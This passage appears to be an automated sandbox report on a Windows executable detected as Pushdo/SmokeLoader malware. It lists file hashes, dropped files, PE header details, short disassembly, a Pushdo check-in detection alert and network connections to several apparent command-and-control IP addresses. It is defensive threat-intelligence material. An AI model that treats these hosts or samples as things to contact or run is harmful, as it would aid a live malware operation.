                                                                                                                                                                                                                                                  • 59.106.13.169
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousPushdo, SmokeLoader, SystemBCBrowse
                                                                                                                                                                                                                                                  • 59.106.13.169
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousPushdo, SmokeLoader, SystemBCBrowse
                                                                                                                                                                                                                                                  • 59.106.13.169
                                                                                                                                                                                                                                                  h9Gwq0fYVO.exeGet hashmaliciousPushdo, SmokeLoaderBrowse
                                                                                                                                                                                                                                                  • 59.106.13.169
                                                                                                                                                                                                                                                  foNMlXr86C.exeGet hashmaliciousPushdo, SmokeLoader, SystemBCBrowse
                                                                                                                                                                                                                                                  • 59.106.13.169
                                                                                                                                                                                                                                                  nwk9iV8lpS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 59.106.13.169
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousPushdo, SmokeLoaderBrowse
                                                                                                                                                                                                                                                  • 59.106.13.169
                                                                                                                                                                                                                                                  3ts2As2Bkm.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 59.106.13.169
                                                                                                                                                                                                                                                  ZBfaaLcshZ.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                  • 59.106.13.169
                                                                                                                                                                                                                                                  No context
                                                                                                                                                                                                                                                  No context
                                                                                                                                                                                                                                                  No context
                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\CX17SY6xF6.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):46
                                                                                                                                                                                                                                                  Entropy (8bit):1.0424600748477153
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:/lbq:4
                                                                                                                                                                                                                                                  MD5:8CB7B7F28464C3FCBAE8A10C46204572
                                                                                                                                                                                                                                                  SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
                                                                                                                                                                                                                                                  SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
                                                                                                                                                                                                                                                  SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                  Preview:........................................user.
                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\CX17SY6xF6.exe
                                                                                                                                                                                                                                                  File Type:Matlab v4 mat-file (little endian) , sparse, rows 0, columns 22
                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                  Size (bytes):1446
                                                                                                                                                                                                                                                  Entropy (8bit):7.43256074707148
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:EtPRDylUzIODFD8dy3EW9jpCoRkNDER4eYAyD3nps2jZ:EtP5ylUzIODFDMy0GCTE2TAy7ndZ
                                                                                                                                                                                                                                                  MD5:70E1015191EED4214003EA3F8D3DCF93
                                                                                                                                                                                                                                                  SHA1:1295050059C92317E87EA47DA3009ACCC06AB6E3
                                                                                                                                                                                                                                                  SHA-256:C154F779E140E43A85171C05F98AC2EC4D6CE3A32846F69410C05D81C8C7B979
                                                                                                                                                                                                                                                  SHA-512:CFB90E2AE08F2C283357DE2247753963520118FC5BB35ECF8989AF853D98D2831FEC92F0678D1A69392549E00320A165BE73D50F2BF132191B6676594AF0E181
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                  Preview:........................................MyDefaultKeyContainer.RSA1.................O...E.oe.`V...r3.wI_.-.T.<3x.).L..y]P.....|R.]..W.>.......y!z..>b...RO...].;d.'.wqX...........<r.$`*...G6.t6Vb.93B...R......................z..O......zV0/X.kH......1....,...C.r.y.p.t.o.A.P.I. .P.r.i.v.a.t.e. .K.e.y....f...... .....`.8g6......sr...O..Wb2.s...Q............ ...q.0....2...{.....|o.^.>nA@7.......v..OR..F.#....@.b..`1..N(..=...b.3Sr.@G...c...yP..:p~..rd@.......}.8f...X.......c...B.N.l=...}[..<5...ch.<..%m.....Z.Q..YB.4R......:..v....p~*/....oo.8eK..G.....B!...s..N.....L+=9U...hBG...35F..1,.t..<(`.3..6>$...b..........w$3..+uVzUK...T..]g.`...4..T2.+L.&.........d[>x.....J-..:.T..K3..e.d.fY.H......P.9.....P._:0.F.D..2D.....,[.E.).*t.I]....N..zS<.U^.^aM._..~>..d..!...n\.Q2P....Pw:..9..V...}.B.s..GKp..Z.iF....g.[......2.o.*B?4N.L.>D:$.&....}..d.|.x.9.5........C]...7.....K..9.......}.4<3.l|....L.n......Cz..x'....?w%....RaQ..jf..v...x.4."f......1J..v.m........JC..<!6
                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\CX17SY6xF6.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):647680
                                                                                                                                                                                                                                                  Entropy (8bit):7.024033720862588
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:fxpO6rJYR9z8fcKObTrge4calxG7G/R2dmyplrx3r3j1+:fxU6dYT8fKPUaa7GK/WlJro
                                                                                                                                                                                                                                                  MD5:CA67C9C17A701B0664B90DE372ACDFB1
                                                                                                                                                                                                                                                  SHA1:8D7E388B5D276816279EF37E7CAB9CD554251737
                                                                                                                                                                                                                                                  SHA-256:DB47DF7CF51747E533C968DA7452F1CE6D20F465D7FCD6E2EAC559266AC3E9ED
                                                                                                                                                                                                                                                  SHA-512:B3DADF871AABA70FAFB20E6AF4601013B225EB27565E6CEA73A739F90993E84F581B0A719AE61019E082B25EF0CDC4C573CBA2BD669C2A7310D8FAE5A6A87B04
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............V...V...V..W...V..W...V..W...V..UV...V..WV..V..VV...V}toV...V...V...V..W...V..[V...V..W...VRich...V........PE..L....6.d.....................j......U.............@..........................0............@....................................(...............................P......................................@...............4............................text...+........................... ..`.rdata...!......."..................@..@.data...X*....... ..................@....gfids..............................@..@.rsrc...............................@..@.reloc..P...........................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\CX17SY6xF6.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):26
                                                                                                                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Entropy (8bit):7.024033720862588
                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                  File name:CX17SY6xF6.exe
                                                                                                                                                                                                                                                  File size:647'680 bytes
                                                                                                                                                                                                                                                  MD5:ca67c9c17a701b0664b90de372acdfb1
                                                                                                                                                                                                                                                  SHA1:8d7e388b5d276816279ef37e7cab9cd554251737
                                                                                                                                                                                                                                                  SHA256:db47df7cf51747e533c968da7452f1ce6d20f465d7fcd6e2eac559266ac3e9ed
                                                                                                                                                                                                                                                  SHA512:b3dadf871aaba70fafb20e6af4601013b225eb27565e6cea73a739f90993e84f581b0a719ae61019e082b25ef0cdc4c573cba2bd669c2a7310d8fae5a6a87b04
                                                                                                                                                                                                                                                  SSDEEP:12288:fxpO6rJYR9z8fcKObTrge4calxG7G/R2dmyplrx3r3j1+:fxU6dYT8fKPUaa7GK/WlJro
                                                                                                                                                                                                                                                  TLSH:9CD4E000F452FC31E9A3353F5861D55BD92C6D2C4B21CB9B3248CB3BBE52190AFA656B
                                                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............V...V...V...W...V...W...V...W...V..UV...V..WV...V..VV...V}toV...V...V...V...W...V..[V...V...W...VRich...V........PE..L..
                                                                                                                                                                                                                                                  Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                                  Entrypoint:0x40dc55
                                                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                                                                                                  Time Stamp:0x64C2368C [Thu Jul 27 09:19:08 2023 UTC]
                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                  OS Version Major:6
                                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                                  File Version Major:6
                                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                                  Subsystem Version Major:6
                                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                                  Import Hash:70358da30a737c94107b030bef3e8be7
                                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                                  call 00007F73BC46358Dh
                                                                                                                                                                                                                                                  jmp 00007F73BC462B13h
                                                                                                                                                                                                                                                  cmp ecx, dword ptr [0049DD74h]
                                                                                                                                                                                                                                                  jne 00007F73BC462C85h
                                                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                                                  jmp 00007F73BC462FD9h
                                                                                                                                                                                                                                                  mov eax, dword ptr [esp+08h]
                                                                                                                                                                                                                                                  mov ecx, dword ptr [esp+10h]
                                                                                                                                                                                                                                                  or ecx, eax
                                                                                                                                                                                                                                                  mov ecx, dword ptr [esp+0Ch]
                                                                                                                                                                                                                                                  jne 00007F73BC462C8Bh
                                                                                                                                                                                                                                                  mov eax, dword ptr [esp+04h]
                                                                                                                                                                                                                                                  mul ecx
                                                                                                                                                                                                                                                  retn 0010h
                                                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                                                  mul ecx
                                                                                                                                                                                                                                                  mov ebx, eax
                                                                                                                                                                                                                                                  mov eax, dword ptr [esp+08h]
                                                                                                                                                                                                                                                  mul dword ptr [esp+14h]
                                                                                                                                                                                                                                                  add ebx, eax
                                                                                                                                                                                                                                                  mov eax, dword ptr [esp+08h]
                                                                                                                                                                                                                                                  mul ecx
                                                                                                                                                                                                                                                  add edx, ebx
                                                                                                                                                                                                                                                  pop ebx
                                                                                                                                                                                                                                                  retn 0010h
                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                  cmp cl, 00000040h
                                                                                                                                                                                                                                                  jnc 00007F73BC462C97h
                                                                                                                                                                                                                                                  cmp cl, 00000020h
                                                                                                                                                                                                                                                  jnc 00007F73BC462C88h
                                                                                                                                                                                                                                                  shld edx, eax, cl
                                                                                                                                                                                                                                                  shl eax, cl
                                                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                                                  mov edx, eax
                                                                                                                                                                                                                                                  xor eax, eax
                                                                                                                                                                                                                                                  and cl, 0000001Fh
                                                                                                                                                                                                                                                  shl edx, cl
                                                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                                                  xor eax, eax
                                                                                                                                                                                                                                                  xor edx, edx
                                                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                  push esi
                                                                                                                                                                                                                                                  mov eax, dword ptr [esp+14h]
                                                                                                                                                                                                                                                  or eax, eax
                                                                                                                                                                                                                                                  jne 00007F73BC462CAAh
                                                                                                                                                                                                                                                  mov ecx, dword ptr [esp+10h]
                                                                                                                                                                                                                                                  mov eax, dword ptr [esp+0Ch]
                                                                                                                                                                                                                                                  xor edx, edx
                                                                                                                                                                                                                                                  div ecx
                                                                                                                                                                                                                                                  mov ebx, eax
                                                                                                                                                                                                                                                  mov eax, dword ptr [esp+08h]
                                                                                                                                                                                                                                                  div ecx
                                                                                                                                                                                                                                                  mov esi, eax
                                                                                                                                                                                                                                                  mov eax, ebx
                                                                                                                                                                                                                                                  mul dword ptr [esp+10h]
                                                                                                                                                                                                                                                  mov ecx, eax
                                                                                                                                                                                                                                                  mov eax, esi
                                                                                                                                                                                                                                                  mul dword ptr [esp+10h]
                                                                                                                                                                                                                                                  add edx, ecx
                                                                                                                                                                                                                                                  jmp 00007F73BC462CC9h
                                                                                                                                                                                                                                                  mov ecx, eax
                                                                                                                                                                                                                                                  mov ebx, dword ptr [esp+10h]
                                                                                                                                                                                                                                                  mov edx, dword ptr [esp+0Ch]
                                                                                                                                                                                                                                                  mov eax, dword ptr [esp+08h]
                                                                                                                                                                                                                                                  shr ecx, 1
                                                                                                                                                                                                                                                  rcr ebx, 1
                                                                                                                                                                                                                                                  shr edx, 1
                                                                                                                                                                                                                                                  rcr eax, 1
                                                                                                                                                                                                                                                  or ecx, ecx
                                                                                                                                                                                                                                                  jne 00007F73BC462C76h
                                                                                                                                                                                                                                                  div ebx
                                                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x5aac40x28.rdata
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xa00000x1e0.rsrc
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xa10000x1750.reloc
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x59ef00x1c.rdata
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x59f100x40.rdata
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x190000x134.rdata
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                  .text0x10000x17f2b0x18000False0.5643208821614584data6.597156253943545IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                  .rdata0x190000x4219e0x42200False0.9165177516540642data7.69665778448415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                  .data0x5c0000x42a580x42000False0.7373342803030303data5.901059325521838IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                  .gfids0x9f0000xd00x200False0.318359375data1.8685085242841921IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                  .rsrc0xa00000x1e00x200False0.525390625data4.692060940173397IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                  .reloc0xa10000x17500x1800False0.802734375data6.619951716720241IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                  RT_MANIFEST0xa00600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                                                                  KERNEL32.dllCreateFileA, CloseHandle, GetCommandLineA, GetCurrentActCtx, FindFirstFileA, FindNextFileA, GetModuleFileNameA, GetModuleHandleA, GetCurrentProcessId, ReadFile, CreateFileMappingA, ExitProcess, VirtualAlloc, CreateMutexA, ReleaseMutex, MultiByteToWideChar, WideCharToMultiByte, SetHandleInformation, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, GetStringTypeW, GetLastError, SetLastError, GetCurrentThreadId, GetACP, EncodePointer, DecodePointer, HeapAlloc, HeapFree, GetModuleHandleW, GetProcAddress, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, FreeLibrary, LoadLibraryExW, LCMapStringW, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, IsValidCodePage, GetOEMCP, GetCPInfo, GetModuleHandleExW, GetProcessHeap, RaiseException, HeapSize, HeapReAlloc, GetStartupInfoW, QueryPerformanceCounter, InitializeSListHead, RtlUnwind, GetStdHandle, WriteFile, GetModuleFileNameW, FindClose, FindFirstFileExW, FindNextFileW, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW
                                                                                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                  EnglishUnited States
                                                                                                                                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                  192.168.2.4188.114.96.749694802016867 07/27/23-21:52:20.127901TCP2016867ET TROJAN Backdoor.Win32.Pushdo.s Checkin4969480192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                  Jul 27, 2023 21:51:56.233550072 CEST2556253219.94.128.87192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:51:56.233722925 CEST5625325192.168.2.4219.94.128.87
                                                                                                                                                                                                                                                  Jul 27, 2023 21:51:58.804796934 CEST8056238104.21.235.31192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:51:58.805020094 CEST5623880192.168.2.4104.21.235.31
                                                                                                                                                                                                                                                  Jul 27, 2023 21:51:59.321151972 CEST8056244141.193.213.20192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:51:59.321250916 CEST5624480192.168.2.4141.193.213.20
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:00.443370104 CEST8056259188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:00.443546057 CEST5625980192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:00.904985905 CEST8056261188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:00.905172110 CEST5626180192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:02.191306114 CEST8056283188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:02.191636086 CEST5628380192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.097811937 CEST4969080192.168.2.4137.118.26.67
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.102468967 CEST4969180192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.104059935 CEST4969280192.168.2.459.106.19.204
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.108124971 CEST4969380192.168.2.4192.124.249.20
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.110268116 CEST4969480192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.123739958 CEST4969580192.168.2.43.130.204.160
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.126645088 CEST8049694188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.126748085 CEST4969480192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.126847982 CEST8049693192.124.249.20192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.126940012 CEST4969380192.168.2.4192.124.249.20
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.127751112 CEST4969680192.168.2.4172.67.208.67
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.127901077 CEST4969480192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.128057957 CEST4969380192.168.2.4192.124.249.20
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.143460035 CEST4969780192.168.2.470.39.251.249
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.144238949 CEST8049696172.67.208.67192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.144313097 CEST8049694188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.144345999 CEST4969680192.168.2.4172.67.208.67
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.144704103 CEST4969680192.168.2.4172.67.208.67
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.146601915 CEST8049693192.124.249.20192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.146830082 CEST8049693192.124.249.20192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.146914959 CEST4969380192.168.2.4192.124.249.20
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.160820961 CEST8049696172.67.208.67192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.171340942 CEST8049696172.67.208.67192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.171462059 CEST4969680192.168.2.4172.67.208.67
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.225824118 CEST8049694188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.225934029 CEST4969480192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.247251034 CEST804969770.39.251.249192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.249758005 CEST4969780192.168.2.470.39.251.249
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.265029907 CEST4969380192.168.2.4192.124.249.20
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.270936966 CEST4969780192.168.2.470.39.251.249
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.272336960 CEST80496953.130.204.160192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.272435904 CEST4969580192.168.2.43.130.204.160
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.277170897 CEST4969480192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.278001070 CEST4969880192.168.2.480.93.82.33
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.278362989 CEST4969580192.168.2.43.130.204.160
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.278470993 CEST4969980192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.284383059 CEST8049693192.124.249.20192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.284451008 CEST4969380192.168.2.4192.124.249.20
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.293988943 CEST8049694188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.311084986 CEST804969880.93.82.33192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.311486959 CEST4969880192.168.2.480.93.82.33
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.348692894 CEST4969880192.168.2.480.93.82.33
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.359898090 CEST8049694188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.360023022 CEST4969480192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.374700069 CEST804969770.39.251.249192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.375824928 CEST804969770.39.251.249192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.375943899 CEST4969780192.168.2.470.39.251.249
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.378068924 CEST804969259.106.19.204192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.378562927 CEST8049691118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.378680944 CEST4969280192.168.2.459.106.19.204
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.379060984 CEST4969180192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.382824898 CEST804969880.93.82.33192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.383055925 CEST4969880192.168.2.480.93.82.33
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.426597118 CEST80496953.130.204.160192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.426630974 CEST80496953.130.204.160192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.426712036 CEST4969580192.168.2.43.130.204.160
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.454814911 CEST4969280192.168.2.459.106.19.204
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.454826117 CEST4969180192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.455398083 CEST4969780192.168.2.470.39.251.249
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.455513954 CEST4969580192.168.2.43.130.204.160
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.475783110 CEST4969880192.168.2.480.93.82.33
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.482567072 CEST4970080192.168.2.43.130.204.160
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.512445927 CEST804969880.93.82.33192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.512552023 CEST4969880192.168.2.480.93.82.33
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.540400028 CEST8049699206.191.152.37192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.540502071 CEST4969980192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.550973892 CEST4969980192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.551148891 CEST4970180192.168.2.434.149.87.45
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.551167011 CEST4970280192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.551278114 CEST4970380192.168.2.4104.26.7.221
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.559876919 CEST804969770.39.251.249192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.559959888 CEST4969780192.168.2.470.39.251.249
